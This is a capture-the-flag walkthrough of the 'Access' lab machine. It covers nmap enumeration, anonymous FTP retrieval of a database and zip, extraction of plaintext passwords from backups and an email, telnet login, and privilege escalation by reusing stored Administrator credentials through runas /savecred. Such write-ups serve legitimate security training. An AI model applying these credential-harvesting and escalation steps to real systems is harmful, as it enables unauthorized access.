Access is a fun box that switches things up a bit by forcing the user the compromise the target via telnet. Users are tasked with enumerating open ports with nmap, exploring ftp, and finding plaintext credentials.
Step 1: Enumerating with NMAP
➜ access nmap -A -vv 10.129.18.109 -p- -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-02-19 13:06 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:06
Completed Parallel DNS resolution of 1 host. at 13:06, 0.02s elapsed
Initiating Connect Scan at 13:06
Scanning 10.129.18.109 [65535 ports]
Discovered open port 80/tcp on 10.129.18.109
Discovered open port 23/tcp on 10.129.18.109
Discovered open port 21/tcp on 10.129.18.109
Connect Scan Timing: About 6.84% done; ETC: 13:14 (0:07:02 remaining)
Connect Scan Timing: About 18.72% done; ETC: 13:12 (0:04:25 remaining)
Connect Scan Timing: About 33.41% done; ETC: 13:11 (0:03:01 remaining)
Connect Scan Timing: About 45.62% done; ETC: 13:11 (0:02:24 remaining)
Connect Scan Timing: About 62.78% done; ETC: 13:10 (0:01:30 remaining)
Connect Scan Timing: About 82.64% done; ETC: 13:10 (0:00:38 remaining)
Completed Connect Scan at 13:10, 227.23s elapsed (65535 total ports)
Initiating Service scan at 13:10
Scanning 3 services on 10.129.18.109
Completed Service scan at 13:13, 164.44s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.18.109.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:13
NSE: [ftp-bounce 10.129.18.109:21] PORT response: 501 Server cannot accept argument.
Completed NSE at 13:13, 14.24s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:13
Completed NSE at 13:13, 1.15s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Nmap scan report for 10.129.18.109
Host is up, received user-set (0.028s latency).
Scanned at 2023-02-19 13:06:58 EST for 407s
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet? syn-ack
80/tcp open http syn-ack Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 407.44 seconds
We can see that ports 21, 23, and 80 are open. Let’s start with port 21, since anonymous FTP access appears to be enabled.
Step 2: Enumerating FTP
Upon logging into FTP we can see that we have access to two directories:
➜ access ftp 10.129.18.109
Connected to 10.129.18.109.
220 Microsoft FTP Service
Name (10.129.18.109:exo): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-23-18 08:16PM <DIR> Backups
08-24-18 09:00PM <DIR> Engineer
226 Transfer complete.
ftp>
Let’s check the first directory, Backups.
ftp> cd Backups
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-23-18 08:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 EPRT command successful.
150 Opening BINARY mode data connection.
100% |*************************************************************************************************************************************************************************************************| 5520 KiB 1.69 MiB/s 00:00 ETA
226 Transfer complete.
5652480 bytes received in 00:03 (1.68 MiB/s)
We can see that we have a Microsoft database file named backup.mdb. Let’s download it and see if we can open it to read the contents. Before that, however, let’s explore the second directory we found earlier.
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 08:16PM <DIR> Backups
08-24-18 09:00PM <DIR> Engineer
226 Transfer complete.
ftp> cd Engineer
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18 12:16AM 10870 Access Control.zip
226 Transfer complete.
We have found a zip file, let’s download this one as well to see what it holds.
ftp> get Access\ Control.zip
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************************************************************************************************| 10870 56.01 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 45 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
10870 bytes received in 00:00 (49.96 KiB/s)
ftp>
Step 3: Accesing the Database
We can use the mdb-tables command to view the tables in the database file:
➜ access mdb-tables backup.mdb
acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx
We are presented with a ton of information, but the auth_user table looks particularly interesting. Could it contain user passwords? Let’s use the mdb-export command to view the contents of the auth_user table:
➜ access mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
We have a list of usernames and passwords. We don’t know where we can use these credentials yet, so let’s take a look at the zip file.
Step 4: Accessing the Zip File
We need to use 7zip to unzip the file, as we tried with unzip and were met with an error message.
➜ access 7z e Access\ Control.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,24 CPUs Intel(R) Xeon(R) CPU E5-2620 v3 @ 2.40GHz (306F2),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
Enter password (will not be echoed):
The file is password protected, but we may be able to access it with one of the passwords we found in the database.
➜ access 7z e Access\ Control.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,24 CPUs Intel(R) Xeon(R) CPU E5-2620 v3 @ 2.40GHz (306F2),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
Enter password (will not be echoed):
Everything is Ok
Size: 271360
Compressed: 10870
➜ access ls
'Access Control.pst' 'Access Control.zip' backup.mdb
We extracted a Microsoft Outlook email folder. We will need to convert it to a readable format. We can use the readpst command to view convert this file into something more readable.
➜ access readpst Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
Let’s take a look at the file contents now.
➜ access cat Access\ Control.mbox
From "john@megacorp.com" Thu Aug 23 19:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--boundary-LibPST-iamunique-1382094217_-_-"
----boundary-LibPST-iamunique-1382094217_-_-
Content-Type: multipart/alternative;
boundary="alt---boundary-LibPST-iamunique-1382094217_-_-"
--alt---boundary-LibPST-iamunique-1382094217_-_-
Content-Type: text/plain; charset="utf-8"
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
--alt---boundary-LibPST-iamunique-1382094217_-_-
Content-Type: text/html; charset="us-ascii"
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40"><head><meta http-equiv=Content-Type content="text/html; charset=us-ascii"><meta name=Generator content="Microsoft Word 15 (filtered medium)"><style><!--
/* Font Definitions */
@font-face
{font-family:"Cambria Math";
panose-1:0 0 0 0 0 0 0 0 0 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
margin-bottom:.0001pt;
font-size:11.0pt;
font-family:"Calibri",sans-serif;}
a:link, span.MsoHyperlink
{mso-style-priority:99;
color:#0563C1;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-priority:99;
color:#954F72;
text-decoration:underline;}
p.msonormal0, li.msonormal0, div.msonormal0
{mso-style-name:msonormal;
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
font-size:11.0pt;
font-family:"Calibri",sans-serif;}
span.EmailStyle18
{mso-style-type:personal-compose;
font-family:"Calibri",sans-serif;
color:windowtext;}
.MsoChpDefault
{mso-style-type:export-only;
font-size:10.0pt;
font-family:"Calibri",sans-serif;}
@page WordSection1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]--></head><body lang=EN-US link="#0563C1" vlink="#954F72"><div class=WordSection1><p class=MsoNormal>Hi there,<o:p></o:p></p><p class=MsoNormal><o:p> </o:p></p><p class=MsoNormal>The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.<o:p></o:p></p><p class=MsoNormal><o:p> </o:p></p><p class=MsoNormal>Regards,<o:p></o:p></p><p class=MsoNormal>John<o:p></o:p></p></div></body></html>
--alt---boundary-LibPST-iamunique-1382094217_-_---
----boundary-LibPST-iamunique-1382094217_-_---
We are given a lot of information, but one line in particular stands out:
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Maybe we can log into the server via telnet with the listed credentials?
Step 5: Accessing Telnet
Let’s try accessing telnet:
➜ access telnet 10.129.18.109 23
Trying 10.129.18.109...
Connected to 10.129.18.109.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
We are able to log in! Let’s grab the user flag and begin the privilege escalation process.
Step 6: Escalating Privileges
Let’s check to see if there are any stored credentials we can use.
C:\Users\security>cmdkey
Creates, displays, and deletes stored user names and passwords.
The syntax of this command is:
CMDKEY [{/add | /generic}:targetname {/smartcard | /user:username {/pass{:password}}} | /delete{:targetname | /ras} | /list{:targetname}]
Examples:
To list available credentials:
cmdkey /list
cmdkey /list:targetname
To create domain credentials:
cmdkey /add:targetname /user:username /pass:password
cmdkey /add:targetname /user:username /pass
cmdkey /add:targetname /user:username
cmdkey /add:targetname /smartcard
To create generic credentials:
The /add switch may be replaced by /generic to create generic credentials
To delete existing credentials:
cmdkey /delete:targetname
To delete RAS credentials:
cmdkey /delete /ras
C:\Users\security>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
Looks like the administrator’s credentials have been stored. Let’s try copying the root flag from the administrator’s desktop to our own by running commands as the administrator.
C:\Users\security\Desktop>runas.exe /user:ACCESS\Administrator /savecred "cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Desktop\root.txt"
C:\Users\security\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\security\Desktop
02/19/2023 06:48 PM <DIR> .
02/19/2023 06:48 PM <DIR> ..
02/19/2023 06:48 PM 34 root.txt
02/19/2023 06:05 PM 34 user.txt
2 File(s) 68 bytes
2 Dir(s) 3,346,583,552 bytes free
We were able to copy the flag! The only remaining steps are to read and submit the flag.